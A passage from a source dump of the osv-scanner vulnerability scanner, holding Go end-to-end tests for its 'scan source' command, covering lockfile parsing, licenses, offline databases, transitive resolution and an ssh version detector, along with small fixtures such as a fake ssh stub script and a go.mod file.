testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_LockfileWithExplicitParseAs(t *testing.T) { t.Parallel() cwd := 
testutility.GetCurrentWorkingDirectory(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "unsupported_parse-as", Args: []string{"", "source", "-L", "my-file:./testdata/locks-many/composer.lock"}, Exit: 127, }, { Name: "empty_is_default", Args: []string{ "", "source", "-L", ":" + filepath.FromSlash("./testdata/locks-many/composer.lock"), }, Exit: 0, }, { Name: "empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows)", Args: []string{ "", "source", "-L", ":" + filepath.FromSlash("./path/to/my:file"), }, Exit: 127, }, { Name: "empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows)", Args: []string{ "", "source", "-L", ":" + filepath.FromSlash("./path/to/my:project/package-lock.json"), }, Exit: 127, }, { Name: "one_lockfile_with_local_path", Args: []string{"", "source", "--lockfile=go.mod:./testdata/locks-many/replace-local.mod"}, Exit: 0, }, { Name: "when_an_explicit_parse-as_is_given,_it's_applied_to_that_file", Args: []string{ "", "source", "-L", "package-lock.json:" + filepath.FromSlash("./testdata/locks-insecure/my-package-lock.json"), filepath.FromSlash("./testdata/locks-insecure"), }, Exit: 1, }, { Name: "multiple,_+_output_order_is_deterministic", Args: []string{ "", "source", "-L", "package-lock.json:" + filepath.FromSlash("./testdata/locks-insecure/my-package-lock.json"), "-L", "yarn.lock:" + filepath.FromSlash("./testdata/locks-insecure/my-yarn.lock"), filepath.FromSlash("./testdata/locks-insecure"), }, Exit: 1, }, { Name: "multiple,_+_output_order_is_deterministic_2", Args: []string{ "", "source", "-L", "yarn.lock:" + filepath.FromSlash("./testdata/locks-insecure/my-yarn.lock"), "-L", "package-lock.json:" + filepath.FromSlash("./testdata/locks-insecure/my-package-lock.json"), filepath.FromSlash("./testdata/locks-insecure"), }, Exit: 1, }, { Name: "files_that_error_on_parsing_stop_parsable_files_from_being_checked", Args: []string{ "", "source", "-L", "Cargo.lock:" + 
filepath.FromSlash("./testdata/locks-insecure/my-package-lock.json"), filepath.FromSlash("./testdata/locks-insecure"), filepath.FromSlash("./testdata/locks-many"), }, Exit: 127, }, { Name: "parse-as_takes_priority,_even_if_it's_wrong", Args: []string{ "", "source", "-L", "package-lock.json:" + filepath.FromSlash("./testdata/locks-many/yarn.lock"), }, Exit: 127, }, { Name: "\"apk-installed\" is supported", Args: []string{ "", "source", "-L", "apk-installed:" + filepath.FromSlash("./testdata/locks-many/installed"), }, Exit: 0, // don't intercept requests for this case as the apk extractor reads the OS version // of the environment its being run in, and currently does not support being overridden HTTPClient: http.DefaultClient, }, { Name: "\"dpkg-status\" is supported", Args: []string{ "", "source", "-L", "dpkg-status:" + filepath.FromSlash("./testdata/locks-many/status"), }, Exit: 0, // don't intercept requests for this case as the dpkg extractor reads the OS version // of the environment its being run in, and currently does not support being overridden HTTPClient: http.DefaultClient, }, { // if this isn't true, the test would fail along the lines of // "could not determine extractor, requested D" Name: "absolute_paths_are_automatically_escaped_on_windows", Args: []string{ "", "source", "-L", filepath.FromSlash(filepath.Join(cwd, "./testdata/locks-many/yarn.lock")), }, Exit: 0, }, { Name: "absolute_paths_work_with_explicit_escaping", Args: []string{ "", "source", "-L", ":" + filepath.FromSlash(filepath.Join(cwd, "./testdata/locks-many/yarn.lock")), }, Exit: 0, }, { Name: "absolute_paths_can_have_explicit_parse_as", Args: []string{ "", "source", "-L", "package-lock.json:" + filepath.FromSlash(filepath.Join(cwd, "./testdata/locks-many/yarn.lock")), }, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() if tt.HTTPClient == nil { tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) } testcmd.RunAndMatchSnapshots(t, tt) }) } } // 
TestCommand_GithubActions tests common actions the github actions reusable workflow will run func TestCommand_GithubActions(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "scanning_osv-scanner_custom_format", Args: []string{"", "source", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner-flutter-deps.json"}, Exit: 1, }, { Name: "scanning_osv-scanner_custom_format_with_git_tag", Args: []string{"", "source", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner-custom-git-tag.json"}, Exit: 1, }, { Name: "scanning_osv-scanner_custom_format_output_json", Args: []string{"", "source", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner-flutter-deps.json", "--format=sarif"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.ReplacePartialFingerprintHash, }, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_LocalDatabases(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "one_specific_supported_lockfile", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "one_specific_supported_sbom_with_vulns", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/sbom-insecure/postgres-stretch.cdx.xml"}, Exit: 1, }, { Name: "one_specific_unsupported_lockfile", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-many/not-a-lockfile.toml"}, Exit: 128, }, { Name: "all_supported_lockfiles_in_the_directory_should_be_checked", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-many-with-insecure"}, Exit: 1, }, { Name: "all_supported_lockfiles_in_the_directory_should_be_checked", Args: []string{"", 
"source", "--offline", "--download-offline-databases", "./testdata/locks-many-with-invalid"}, Exit: 127, }, { Name: "only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion)", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "nested_directories_are_checked_when_`--recursive`_is_passed", Args: []string{"", "source", "--offline", "--download-offline-databases", "--recursive", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: ".gitignored_files", Args: []string{"", "source", "--offline", "--download-offline-databases", "--recursive", "./testdata/locks-gitignore"}, Exit: 0, }, { Name: "ignoring_.gitignore", Args: []string{"", "source", "--offline", "--download-offline-databases", "--recursive", "--no-ignore", "./testdata/locks-gitignore"}, Exit: 0, }, { Name: "output_with_json", Args: []string{"", "source", "--offline", "--download-offline-databases", "--format", "json", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "output_format:_markdown_table", Args: []string{"", "source", "--offline", "--download-offline-databases", "--format", "markdown", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "database_should_be_downloaded_only_when_offline_is_set", Args: []string{"", "source", "--download-offline-databases", "./testdata/locks-many"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) old := tt.Args tt.Args = []string{"", "source", "--local-db-path", testDir} tt.Args = append(tt.Args, old[2:]...) 
tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) // run each test twice since they should provide the same output, // and the second run should be fast as the db is already available testcmd.RunAndMatchSnapshots(t, tt) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_LocalDatabases_AlwaysOffline(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "a_bunch_of_different_lockfiles_and_ecosystem", Args: []string{"", "source", "--offline", "./testdata/locks-requirements", "./testdata/locks-many-with-insecure"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) old := tt.Args tt.Args = []string{"", "source", "--local-db-path", testDir} tt.Args = append(tt.Args, old[2:]...) tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) // run each test twice since they should provide the same output, // and the second run should be fast as the db is already available testcmd.RunAndMatchSnapshots(t, tt) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_CommitSupport(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "online_uses_git_commits", Args: []string{"", "source", "--lockfile", "osv-scanner:./testdata/locks-git/osv-scanner.json"}, Exit: 1, }, { Name: "offline_uses_git_tags", Args: []string{"", "source", "--offline", "--download-offline-databases", "--lockfile", "osv-scanner:./testdata/locks-git/osv-scanner.json"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_Licenses(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "No_vulnerabilities_with_license_summary", Args: []string{"", "source", "--licenses", "./testdata/locks-many"}, Exit: 0, }, { Name: 
"No_vulnerabilities_with_license_summary_in_markdown", Args: []string{"", "source", "--licenses", "--format=markdown", "./testdata/locks-many"}, Exit: 0, }, { Name: "Vulnerabilities_and_license_summary", Args: []string{"", "source", "--licenses", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, { Name: "Vulnerabilities_and_license_violations_with_allowlist", Args: []string{"", "source", "--licenses=MIT", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, { Name: "No_vulnerabilities_but_license_violations_with_allowlist", Args: []string{"", "source", "--licenses=Apache-2.0", "--config=./testdata/osv-scanner-empty-config.toml", "./testdata/locks-many/yarn.lock"}, Exit: 1, }, { Name: "Vulnerabilities_and_all_license_violations_allowlisted", Args: []string{"", "source", "--licenses=Apache-2.0", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, { Name: "Some_packages_with_license_violations_and_show-all-packages_in_json", Args: []string{"", "source", "--format=json", "--licenses=MIT", "--all-packages", "./testdata/locks-licenses/package-lock.json"}, Exit: 1, }, { Name: "Some_packages_with_ignored_licenses", Args: []string{"", "source", "--config=./testdata/osv-scanner-complex-licenses-config.toml", "--licenses=MIT", "./testdata/locks-many", "./testdata/locks-insecure"}, Exit: 1, }, { Name: "Some_packages_with_license_violations_in_json", Args: []string{"", "source", "--format=json", "--licenses=MIT", "./testdata/locks-licenses/package-lock.json"}, Exit: 1, }, { Name: "No_license_violations_and_show-all-packages_in_json", Args: []string{"", "source", "--format=json", "--licenses=MIT,Apache-2.0", "--all-packages", "./testdata/locks-licenses/package-lock.json"}, Exit: 0, }, { Name: "Show_all_Packages_with_license_summary_in_json", Args: []string{"", "source", "--format=json", "--licenses", "--all-packages", "./testdata/locks-licenses/package-lock.json"}, Exit: 0, }, { Name: "Licenses_in_summary_mode_json", Args: 
[]string{"", "source", "--format=json", "--licenses", "./testdata/locks-licenses/package-lock.json"}, Exit: 0, }, { Name: "Licenses_with_expressions", Args: []string{"", "source", "--config=./testdata/osv-scanner-expressive-licenses-config.toml", "--licenses=MIT,BSD-3-Clause", "./testdata/locks-licenses/package-lock.json"}, Exit: 1, }, { Name: "Licenses_with_invalid_licenses_in_flag", Args: []string{"", "source", "--licenses=MIT,something-something", "./testdata/locks-licenses/package-lock.json"}, Exit: 127, }, { Name: "Licenses_with_invalid_expression_in_config", Args: []string{"", "source", "--config=./testdata/osv-scanner-invalid-licenses-config.toml", "--licenses=MIT,BSD-3-Clause", "./testdata/locks-licenses/package-lock.json"}, Exit: 1, }, { Name: "When_offline_licenses_summary_cannot_be_printed", Args: []string{"", "source", "--offline", "--licenses", "./testdata/locks-many/package-lock.json"}, Exit: 127, }, { Name: "When_offline_licenses_cannot_be_checked", Args: []string{"", "source", "--offline", "--licenses=MIT", "./testdata/locks-many/package-lock.json"}, Exit: 127, }, { Name: "When_offline_licenses_are_still_validated", Args: []string{"", "source", "--offline", "--licenses=MIT,something-something", "./testdata/locks-many/package-lock.json"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_Transitive(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "pom.xml_transitive_default", Args: []string{"", "source", "./testdata/maven-transitive/pom.xml"}, Exit: 1, }, { Name: "pom.xml_transitive_explicit_lockfile", Args: []string{"", "source", "-L", "pom.xml:./testdata/maven-transitive/abc.xml"}, Exit: 1, }, { Name: "pom.xml_multiple_registries", Args: []string{"", "source", "-L", "pom.xml:./testdata/maven-transitive/registry.xml"}, 
Exit: 1, }, { Name: "pom.xml_transitive_native_source", Args: []string{"", "source", "--data-source=native", "-L", "pom.xml:./testdata/maven-transitive/registry.xml"}, Exit: 1, }, { Name: "pom.xml_non_utf8_encoding", Args: []string{"", "source", "-L", "pom.xml:./testdata/maven-transitive/encoding.xml"}, Exit: 1, }, { Name: "pom.xml_no_resolve_no_transitive", Args: []string{"", "source", "--no-resolve", "./testdata/maven-transitive/pom.xml"}, // Direct dependencies do not have any vulnerability. Exit: 0, }, { Name: "pom.xml_offline_no_transitive", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/maven-transitive/pom.xml"}, // Direct dependencies do not have any vulnerability. Exit: 0, }, { Name: "pom.xml_enricher_requires_extractor", Args: []string{"", "source", "--experimental-disable-plugins=java/pomxml", "./testdata/maven-transitive/abc.xml"}, Exit: 128, }, { Name: "invalid_data_source_error", Args: []string{"", "source", "--data-source=github", "-L", "pom.xml:./testdata/maven-transitive/registry.xml"}, Exit: 127, }, { Name: "requirements.txt_transitive_default", Args: []string{"", "source", "-L", "./testdata/locks-requirements/requirements.txt"}, Exit: 1, }, { Name: "requirements.txt_transitive_native_source", Args: []string{"", "source", "--data-source=native", "-L", "requirements.txt:./testdata/locks-requirements/requirements.txt"}, Exit: 1, }, { Name: "requirements.txt_no_resolve_no_transitive", Args: []string{"", "source", "--no-resolve", "./testdata/locks-requirements/requirements.txt"}, Exit: 1, }, { Name: "requirements.txt_offline_no_transitive", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-requirements/requirements.txt"}, Exit: 1, }, { Name: "requirements.txt_enricher_requires_extractor", Args: []string{"", "source", "--experimental-disable-plugins=python/requirements", "./testdata/locks-requirements/requirements-transitive.txt"}, Exit: 128, }, { Name: 
"requirements.txt_resolution_fallback", Args: []string{"", "source", "./testdata/locks-requirements/unresolvable-requirements.txt"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_MoreLockfiles(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "uv.lock", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/uv.lock"}, Exit: 1, }, { Name: "depsjson", Args: []string{"", "source", "-L", "deps.json:./testdata/locks-scalibr/depsjson"}, Exit: 1, }, { Name: "cabal.project.freeze", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/cabal.project.freeze"}, Exit: 1, }, { Name: "stack.yaml.lock", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/stack.yaml.lock"}, Exit: 0, }, { Name: "packages.config", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/packages.config"}, Exit: 0, }, { Name: "packages.lock.json", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/packages.lock.json"}, Exit: 0, }, { Name: "gems.locked", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/gems.locked"}, Exit: 1, }, { Name: "Podfile.lock_-_Unsupported_ecosystem,_should_not_be_scanned", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/Podfile.lock"}, Exit: 127, }, { Name: "Package.resolved_-_Unsupported_ecosystem,_should_not_be_scanned", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/Package.resolved"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommandNonGit(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) err := os.CopyFS(testDir, os.DirFS("./testdata/locks-many")) if err != nil { t.Fatal(err) } client := testcmd.InsertCassette(t) tests := 
[]testcmd.Case{
		// one specific supported lockfile
		{
			Name: "one_specific_supported_lockfile",
			Args: []string{"", "source", filepath.Join(testDir, "composer.lock")},
			Exit: 0,
		},
	}

	for _, tt := range tests {
		t.Run(tt.Name, func(t *testing.T) {
			t.Parallel()

			tt.HTTPClient = testcmd.WithTestNameHeader(t, *client)

			testcmd.RunAndMatchSnapshots(t, tt)
		})
	}
}

// TestCommand_HtmlFile scans ./testdata/locks-many/composer.lock with
// --format=html and --output-file pointing into a fresh test directory,
// matches the snapshots, and then checks that the report file exists.
func TestCommand_HtmlFile(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)
	client := testcmd.InsertCassette(t)

	// the same path is passed to the scanner and stat'ed afterwards
	reportPath := testDir + "/report.html"

	testcmd.RunAndMatchSnapshots(t, testcmd.Case{
		Name:       "one_specific_supported_lockfile",
		Args:       []string{"", "source", "--format=html", "--output-file", reportPath, "./testdata/locks-many/composer.lock"},
		Exit:       0,
		HTTPClient: testcmd.WithTestNameHeader(t, *client),
	})

	if _, err := os.Stat(reportPath); err != nil {
		t.Errorf("Unexpected %v", err)
	}
}

// TestCommand_HtmlFile_Deprecated is the same check as TestCommand_HtmlFile
// but passes the report path through the --output flag instead of
// --output-file.
func TestCommand_HtmlFile_Deprecated(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)
	client := testcmd.InsertCassette(t)

	// the same path is passed to the scanner and stat'ed afterwards
	reportPath := testDir + "/report.html"

	testcmd.RunAndMatchSnapshots(t, testcmd.Case{
		Name:       "one_specific_supported_lockfile",
		Args:       []string{"", "source", "--format=html", "--output", reportPath, "./testdata/locks-many/composer.lock"},
		Exit:       0,
		HTTPClient: testcmd.WithTestNameHeader(t, *client),
	})

	if _, err := os.Stat(reportPath); err != nil {
		t.Errorf("Unexpected %v", err)
	}
}

// TestCommand_WithDetector_OnLinux runs the scanner with the
// cve/cve-2023-38408 plugin enabled against a stubbed ssh, and is skipped
// unless GOOS is linux.
//
// The contents of ./testdata/bin are copied to <testDir>/bin and that
// directory is put first in PATH for every case, so that the fake ssh script
// is what the detector invokes. OSV_SCANNER_TEST_SSH_VERSION_OUTPUT carries
// the version string each case wants the stub to report. Every case expects
// exit code 0.
//
// NOTE(review): the stub only takes effect if the detector resolves ssh
// through PATH, which would also mean a real scan reports on whichever ssh
// comes first in the caller's PATH - confirm that is the intended scope.
func TestCommand_WithDetector_OnLinux(t *testing.T) {
	if runtime.GOOS != "linux" {
		testutility.Skip(t, "The detector in this test only works on Linux")
	}

	testDir := testutility.CreateTestDir(t)
	fakeBinDir := testDir + "/bin"

	if err := os.CopyFS(testDir, os.DirFS("./testdata/locks-many")); err != nil {
		t.Fatal(err)
	}

	if err := os.CopyFS(fakeBinDir, os.DirFS("./testdata/bin")); err != nil {
		t.Fatal(err)
	}

	client := testcmd.InsertCassette(t)

	tests := []struct {
		Name string
		Args []string
		Exit int
		SSHV string // value the fake ssh prints; empty makes it exit with code 1
	}{
		{
			Name: "ssh_version_is_before_first_vuln_version",
			Args: []string{
				"", "source",
				"--experimental-plugins", "php/composerlock",
				"--experimental-plugins", "cve/cve-2023-38408",
				filepath.Join(testDir, "composer.lock"),
			},
			Exit: 0,
			SSHV: "OpenSSH_5.4 Ubuntu-3ubuntu0.13, OpenSSL 3.0.2 15 Mar 2022",
		},
		{
			Name: "ssh_version_is_after_last_vuln_version",
			Args: []string{
				"", "source",
				"--experimental-plugins", "php/composerlock",
				"--experimental-plugins", "cve/cve-2023-38408",
				filepath.Join(testDir, "composer.lock"),
			},
			Exit: 0,
			SSHV: "OpenSSH_9.3p2 Ubuntu-3ubuntu0.13, OpenSSL 3.0.2 15 Mar 2022",
		},
		{
			Name: "ssh_version_errors",
			Args: []string{
				"", "source",
				"--experimental-plugins", "php/composerlock",
				"--experimental-plugins", "cve/cve-2023-38408",
				filepath.Join(testDir, "composer.lock"),
			},
			Exit: 0,
			SSHV: "",
		},
	}

	// the subtests are not marked parallel: t.Setenv cannot be used in
	// parallel tests
	for _, tc := range tests {
		t.Run(tc.Name, func(t *testing.T) {
			// prepend our bin directory to the PATH variable so that
			// our fake ssh script will be invoked by the detector
			t.Setenv("PATH", fakeBinDir+"/:"+os.Getenv("PATH"))
			t.Setenv("OSV_SCANNER_TEST_SSH_VERSION_OUTPUT", tc.SSHV)

			testcmd.RunAndMatchSnapshots(t, testcmd.Case{
				Name:       tc.Name,
				Args:       tc.Args,
				Exit:       tc.Exit,
				HTTPClient: testcmd.WithTestNameHeader(t, *client),
			})
		})
	}
}

// TestCommand_WithDetector_OffLinux runs the same cases as
// TestCommand_WithDetector_OnLinux with the same PATH and environment setup,
// but is skipped when GOOS is linux. Every case expects exit code 0.
func TestCommand_WithDetector_OffLinux(t *testing.T) {
	if runtime.GOOS == "linux" {
		testutility.Skip(t, "The detector in this test only works on non-linux")
	}

	testDir := testutility.CreateTestDir(t)
	fakeBinDir := testDir + "/bin"

	if err := os.CopyFS(testDir, os.DirFS("./testdata/locks-many")); err != nil {
		t.Fatal(err)
	}

	if err := os.CopyFS(fakeBinDir, os.DirFS("./testdata/bin")); err != nil {
		t.Fatal(err)
	}

	client := testcmd.InsertCassette(t)

	tests := []struct {
		Name string
		Args []string
		Exit int
		SSHV string // value the fake ssh prints; empty makes it exit with code 1
	}{
		{
			Name: "ssh_version_is_before_first_vuln_version",
			Args: []string{
				"", "source",
				"--experimental-plugins", "php/composerlock",
				"--experimental-plugins", "cve/cve-2023-38408",
				filepath.Join(testDir, "composer.lock"),
			},
			Exit: 0,
			SSHV: "OpenSSH_5.4 Ubuntu-3ubuntu0.13, OpenSSL 3.0.2 15 Mar 2022",
		},
		{
			Name: "ssh_version_is_after_last_vuln_version",
			Args: []string{
				"", "source",
				"--experimental-plugins", "php/composerlock",
				"--experimental-plugins", "cve/cve-2023-38408",
				filepath.Join(testDir, "composer.lock"),
			},
			Exit: 0,
			SSHV: "OpenSSH_9.3p2 Ubuntu-3ubuntu0.13, OpenSSL 3.0.2 15 Mar 2022",
		},
		{
			Name: "ssh_version_errors",
			Args: []string{
				"", "source",
				"--experimental-plugins", "php/composerlock",
				"--experimental-plugins", "cve/cve-2023-38408",
				filepath.Join(testDir, "composer.lock"),
			},
			Exit: 0,
			SSHV: "",
		},
	}

	// the subtests are not marked parallel: t.Setenv cannot be used in
	// parallel tests
	for _, tc := range tests {
		t.Run(tc.Name, func(t *testing.T) {
			// prepend our bin directory to the PATH variable so that
			// our fake ssh script will be invoked by the detector
			t.Setenv("PATH", fakeBinDir+"/:"+os.Getenv("PATH"))
			t.Setenv("OSV_SCANNER_TEST_SSH_VERSION_OUTPUT", tc.SSHV)

			testcmd.RunAndMatchSnapshots(t, testcmd.Case{
				Name:       tc.Name,
				Args:       tc.Args,
				Exit:       tc.Exit,
				HTTPClient: testcmd.WithTestNameHeader(t, *client),
			})
		})
	}
}

// TestCommand_Filter scans an osv-scanner.json lockfile with --all-packages
// and an empty config in JSON format, expecting exit code 0. No cassette
// client is attached to the case in this test.
func TestCommand_Filter(t *testing.T) {
	t.Parallel()

	tests := []testcmd.Case{
		{
			Name: "Show_all_Packages_with_empty_config",
			Args: []string{"", "source", "--format=json", "--all-packages", "--config=./testdata/osv-scanner-empty-config.toml", "--lockfile=osv-scanner:./testdata/locks-insecure/osv-scanner-with-unscannables.json"},
			Exit: 0,
		},
	}

	for _, tc := range tests {
		t.Run(tc.Name, func(t *testing.T) {
			t.Parallel()

			testcmd.RunAndMatchSnapshots(t, tc)
		})
	}
}

// TestCommand_FlagDeprecatedPackages runs the scanner with
// --experimental-flag-deprecated-packages against lockfiles under
// ./testdata/exp-plugins-pkgdeprecate.
func TestCommand_FlagDeprecatedPackages(t *testing.T) {
	t.Parallel()

	tests := []testcmd.Case{
		{
			Name: "package_deprecated_false_no_vuln_json",
			Args: []string{
				"", "source",
				"--format=json",
				"--experimental-flag-deprecated-packages",
				"./testdata/exp-plugins-pkgdeprecate/clean/Cargo.lock",
			},
			Exit: 0,
		},
		{
			Name: "package_deprecated_true_no_vuln_json",
			Args: []string{
				"", "source",
				"--format=json",
				"--experimental-flag-deprecated-packages",
				"./testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock",
			},
			Exit: 1,
			ReplaceRules: []testutility.JSONReplaceRule{
				testutility.GroupsAsArrayLen,
				testutility.OnlyIDVulnsRule,
			},
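		},
		{
			Name: "package_deprecated_true_with_vuln_json",
			Args: []string{
				"", "source",
				"--format=json",
				"--experimental-flag-deprecated-packages",
				"./testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock",
			},
			Exit: 1,
			ReplaceRules: []testutility.JSONReplaceRule{
				testutility.GroupsAsArrayLen,
				testutility.OnlyIDVulnsRule,
			},
		},
		{
			Name: "package_deprecated_npm_json",
			Args: []string{
				"", "source",
				"--format=json",
				"--experimental-flag-deprecated-packages",
				"./testdata/exp-plugins-pkgdeprecate/deprecated-npm/package-lock.json",
			},
			Exit: 1,
			ReplaceRules: []testutility.JSONReplaceRule{
				testutility.GroupsAsArrayLen,
				testutility.OnlyIDVulnsRule,
			},
		},
		{
			Name: "package_deprecated_true_no_vuln_table",
			Args: []string{
				"", "source",
				"--format=table",
				"--experimental-flag-deprecated-packages",
				"./testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock",
			},
			Exit: 1,
		},
		{
			Name: "package_deprecated_true_with_vuln_table",
			Args: []string{
				"", "source",
				"--format=table",
				"--experimental-flag-deprecated-packages",
				"./testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock",
			},
			Exit: 1,
		},
	}

	for _, tt := range tests {
		t.Run(tt.Name, func(t *testing.T) {
			t.Parallel()

			testcmd.RunAndMatchSnapshots(t, tt)
		})
	}
}

================================================
FILE: cmd/osv-scanner/scan/source/testdata/.goignore
================================================
call-analysis-go-project

================================================
FILE: cmd/osv-scanner/scan/source/testdata/artifact/osv-scanner.toml
================================================
[[PackageOverrides]]
ignore = true

================================================
FILE: cmd/osv-scanner/scan/source/testdata/bin/ssh
================================================
#!/usr/bin/env bash

# this is a fake ssh used in some tests, which outputs the value of the
# $OSV_SCANNER_TEST_SSH_VERSION_OUTPUT environment variable, unless it
# is empty in which case the script exits with code 1 as if it errored
#
# the variable is quoted inside the test: the tests set it to version strings
# that contain spaces, and an unquoted expansion would be word-split so that
# `[` fails with "too many arguments" on stderr instead of evaluating -z

if [ -z "$OSV_SCANNER_TEST_SSH_VERSION_OUTPUT" ]; then
  exit 1
fi

echo "$OSV_SCANNER_TEST_SSH_VERSION_OUTPUT"

================================================
FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project/go.mod
================================================
module github.com/ossf-tests/osv-e2e

go 1.19

require github.com/gogo/protobuf v1.3.1

require github.com/ipfs/go-bitfield v1.0.0

require golang.org/x/image v0.4.0 // indirect

================================================
FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project/go.sum
================================================
github.com/gogo/protobuf v1.3.1 h1:DqDEcV5aeaTmdFBePNpYsp3FlcVH/2ISVVM9Qf8PSls=
github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o=
github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ=
github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus=
github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00=
github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
golang.org/x/image v0.4.0 h1:x1RWAiZIvERqkltrFjtQP1ycmiR5pmhjtCfVOtdURuQ=
golang.org/x/image v0.4.0/go.mod h1:FVC7BI/5Ym8R25iw5OLsgshdUBbT1h5jZTpA+mvAdZ4=
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod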
